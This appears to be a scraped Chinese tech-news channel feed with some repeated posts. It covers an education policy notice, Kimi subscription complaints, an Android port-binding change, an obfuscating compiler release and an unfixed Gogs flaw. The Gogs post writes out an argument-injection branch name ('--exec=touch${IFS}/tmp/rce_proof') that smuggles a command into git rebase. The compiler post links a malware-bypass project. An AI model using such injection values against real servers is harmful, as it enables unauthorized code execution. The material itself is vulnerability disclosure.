教育部:推动录取通知书回归一页纸
https://mp.weixin.qq.com/s/rctrmp2v0ZIfOfpUGLKbrQ
记者从教育部获悉,2026年全国高考报名人数为1290万人。6月3日,教育部发文提到严肃招生宣传纪律称:
指导各地各校严格落实高校招生宣传工作纪律要求,严禁虚假宣传、违规承诺,严禁以任何形式炒作“高考状元”“高分考生”“升学率”。推动高校录取通知书回归“一页纸”,坚决纠治奢华录取通知书、新生礼盒等不良风气。
中青评论曾发文表示:
录取通知书是大学与已录取新生的第一次正式接触,这堂特殊的“新生第一课”肩负着传达高校培养理念与期待、营造仪式感的功能。如何完成好这份任务,平衡好实效和形式,考验着高校的“绣花针”功夫。
https://mp.weixin.qq.com/s/rctrmp2v0ZIfOfpUGLKbrQ
Coreutils for Windows (🔥 Score: 151+ in 2 hours)
Link: https://readhacker.news/s/6Vt2X
Comments: https://readhacker.news/c/6Vt2X
Link: https://readhacker.news/s/6Vt2X
Comments: https://readhacker.news/c/6Vt2X
GitHub
GitHub - microsoft/coreutils: Coreutils for Windows: Installer & Packaging
Coreutils for Windows: Installer & Packaging. Contribute to microsoft/coreutils development by creating an account on GitHub.
*顺道再提一句,他们 199 撞了总限度之后甚至没法加钱买 Credit,要么升级到最高档要么换个新手机号再开一个 199
刚刚搜了下隔壁论坛也有讨论:https://linux.do/t/topic/2282380
刚刚搜了下隔壁论坛也有讨论:https://linux.do/t/topic/2282380
近期 Kimi 的抽象操作还包括把所有的模型调用都计算入他们的总权益,Kimi Claw 和 Kimi Code 的调用也会计入。
然后就会带来一个问题:你如果被其他的功能用光了总的订阅额度,那么 Kimi Code 实际上也是用不了的(因为要占总额度),所以说现在事实上的 20倍啊5小时限制啊周限啊都是假的,下周刷新了你还是用不了🤡
我一直给别人推荐 Kimi 的原因是他的网页端 Agent 整合比较好,能够相比于其他的 Coding Plan 提供一些网页上比较好用的配套功能,而且曾经是加到 199 档就可以获得一些比较好的体验。
那现在连花了钱的额度都能给我 rate limit 那还说啥了,取消自动续费等 DeepSeek 出多模态整顿市场然后让月之暗面拿头撞梁圣的脚底板吧
https://github.com/clash-verge-rev/clash-verge-rev/blob/dev/docs/cvd-protocol-introduction.md
🤪
CVD 在原有订阅流程上增加了设备公钥、加密响应和设备槽位管理:服务提供方可以识别设备、限制数量、解绑旧设备,并为每台设备单独加密订阅内容。
🤪
GitHub
clash-verge-rev/docs/cvd-protocol-introduction.md at dev · clash-verge-rev/clash-verge-rev
A modern GUI client based on Tauri, designed to run in Windows, macOS and Linux for tailored proxy experience - clash-verge-rev/clash-verge-rev
好了,现在母项目 ClawCloud 也正式倒闭了,好似喵
https://claw.cloud/announcements/38?language=chinese-simplified
https://claw.cloud/announcements/38?language=chinese-simplified
https://github.com/komimoe/Arkari/releases/tag/llvm-20-obf1.9.1
反客为主
反客为主
GitHub
Release ArkariLLVM-20-obf1.9.1 · komimoe/Arkari
README !!!
写马的请移步: https://github.com/Yeuoly/0xUBypass
操你妈,谁用我的编译器写了个内核驱动的马丢我电脑上来了?
文件名: MedusaKernel.sys
SHA2: C3DB5B81415584223FE7BABA20AABBDEE4C07BB0871A1EC36C3EF1D4DE033CA3
分析:
1. 执行摘要
经过详细...
写马的请移步: https://github.com/Yeuoly/0xUBypass
操你妈,谁用我的编译器写了个内核驱动的马丢我电脑上来了?
文件名: MedusaKernel.sys
SHA2: C3DB5B81415584223FE7BABA20AABBDEE4C07BB0871A1EC36C3EF1D4DE033CA3
分析:
1. 执行摘要
经过详细...
Android已允许app绑定特权端口
这是通过 Connectivity/Tethering Mainline APEX 模块中的 eBPF cgroup 绑定钩子实现的。
该功能将作为 2026 年 5 月 Google Play 系统更新的一部分发布,该更新是 Android 17(包括最新 beta 版)的基本网络堆栈要求。
由于这是通过 cgroup/bind eBPF 程序动态评估的,因此系统避免降低全局 net.ipv4.ip_unprivileged_port_start sysctl 权限或全局分配 CAP_NET_BIND_SERVICE 权限。相反,它会选择性地允许特定的常用协议:
- TCP:20/21(FTP)、22(SSH/SFTP)、23(Telnet)、80(HTTP)、443(HTTPS)、445(SMB)、515(LPD)、631(IPP)
- UDP:319/320(PTP),443(HTTP/3 / QUIC)
激活此功能的条件:
- Android 13(API 33)或更高版本。在此之前的版本中,相关的 eBPF 代码尚未包含在主线版本中。
- 内核版本需为 5.15 或更高版本。这是一项硬性要求,因为旧版本内核缺少必要的 eBPF 返回标志基础架构,无法在绑定钩子期间绕过功能检查。
- 设备必须能够接收并积极应用 Google Play 系统更新(涵盖大多数标准认证的手机和平板电脑)。
注意:Android Auto、Wear、TV 或 Go 等应用可能会滞后,或者取决于系统供应商的完整 OTA 更新,具体取决于其主线实现情况。
源代码应该会与 Android 17 的其他部分一起发布,预计会在以下位置发布:
https://cs.android.com/android/platform/superproject/+/android-latest-release:packages/modules/Connectivity/bpf/progs/netd.c
这是通过 Connectivity/Tethering Mainline APEX 模块中的 eBPF cgroup 绑定钩子实现的。
该功能将作为 2026 年 5 月 Google Play 系统更新的一部分发布,该更新是 Android 17(包括最新 beta 版)的基本网络堆栈要求。
由于这是通过 cgroup/bind eBPF 程序动态评估的,因此系统避免降低全局 net.ipv4.ip_unprivileged_port_start sysctl 权限或全局分配 CAP_NET_BIND_SERVICE 权限。相反,它会选择性地允许特定的常用协议:
- TCP:20/21(FTP)、22(SSH/SFTP)、23(Telnet)、80(HTTP)、443(HTTPS)、445(SMB)、515(LPD)、631(IPP)
- UDP:319/320(PTP),443(HTTP/3 / QUIC)
激活此功能的条件:
- Android 13(API 33)或更高版本。在此之前的版本中,相关的 eBPF 代码尚未包含在主线版本中。
- 内核版本需为 5.15 或更高版本。这是一项硬性要求,因为旧版本内核缺少必要的 eBPF 返回标志基础架构,无法在绑定钩子期间绕过功能检查。
- 设备必须能够接收并积极应用 Google Play 系统更新(涵盖大多数标准认证的手机和平板电脑)。
注意:Android Auto、Wear、TV 或 Go 等应用可能会滞后,或者取决于系统供应商的完整 OTA 更新,具体取决于其主线实现情况。
源代码应该会与 Android 17 的其他部分一起发布,预计会在以下位置发布:
https://cs.android.com/android/platform/superproject/+/android-latest-release:packages/modules/Connectivity/bpf/progs/netd.c
Gogs RCE (NOT FIXED)
创建一个名为
git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
创建一个名为
--exec=touch${IFS}/tmp/rce_proof 的 branchgit rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
Rapid7
Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue (Score: 150+ in 6 hours)
Link: https://readhacker.news/s/6V6tA
Comments: https://readhacker.news/c/6V6tA
Link: https://readhacker.news/s/6V6tA
Comments: https://readhacker.news/c/6V6tA
llmgame.scalex.dev
Continue? Y/N
A 30-second game about LLM permission fatigue. How carefully do you really read AI commands?
